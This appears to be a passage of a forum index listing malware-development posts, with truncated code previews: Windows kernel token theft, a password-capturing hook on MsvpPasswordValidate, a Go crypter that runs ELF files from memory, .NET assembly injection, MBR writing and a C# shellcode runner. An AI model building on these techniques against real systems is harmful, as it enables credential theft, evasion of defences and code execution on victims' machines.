Author: SWaNk - Replies: 0 - Views: 988
Starting with Windows Kernel Exploitation

Starting with Windows Kernel Exploitation Based on HackSysExtremeVulnerableDriver

Part 1 – setting up the lab
Part 2 – getting familiar with HackSys Extreme Vulnerable Driver
Part 3 – stealing the Access Token

Author: regasmx86 - Replies: 0 - Views: 1013
[Windows] Password Hooking with MsvpPasswordValidate

#include "common.h"

MsvpPasswordValidate( BOOLEAN UasCompatibilityRequired,
      PVOID LogonInformation,
      PULONG UserFlags,
      PUSER_SESSION_KEY UserSessionKey,
      PVOID LmSessionKey
return ((FnMsvpPasswordValidate)g_MsvpPasswordValidate)(
Author: TMZ - Replies: 0 - Views: 1194
Ezuri: Linux runtime crypter with memfd_create
A small Golang runtime crypter demonstrating memfd_create syscall usage to run ELF executables from memory in Linux. Works on kernel versions >= 3.17 (relies on the memfd_create syscall).

package main

import (

func aesEnc(srcBytes []byte, key string, iv string) []byte {
block, err := aes.NewCipher([]byte(key))

encrypter := cipher.NewCFBEncrypter(block, []byte(iv))
encrypted := make([]byte, len(srcBytes))
Author: TMZ - Replies: 1 - Views: 1074
Injection with Mono.Cecil
This may not be news for everyone but I find it interesting. Mono.Cecil is an impressive work and can provide a lot of cool features such as runtime .NET assembly manipulation. We can inject opcodes (IL instructions) into a target assembly, transforming it as we wish. Here’s the test scenario:

A dummy C# application like the one below, compile it to get its executable file, that’s what we need:

using System;

namespace Dummy
class Program
public static v
Author: TMZ - Replies: 0 - Views: 897
MBR Dump With .NET
Years ago I was messing around with Windows MBR (on VXHeaven) and got stuck while trying to write a modified copy back to the disk.

using System;
using System.Runtime.InteropServices;
using Microsoft.Win32.SafeHandles;
using System.IO;

namespace MBR
class MainClass

[DllImport("Kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
static extern uint SetFilePointer(
[In] SafeFileHandle hFile,
[In] int lDistanceToMove,
[Out] out int lpDis
Author: regasmx86 - Replies: 0 - Views: 1369
Shellcode execution with C#
Your shellcode has to be pasted in C++ format: { 0xDE, 0xAD, 0xBE, 0xEF }

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;

namespace Net_Shellcode_Execution
class Program
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
private static extern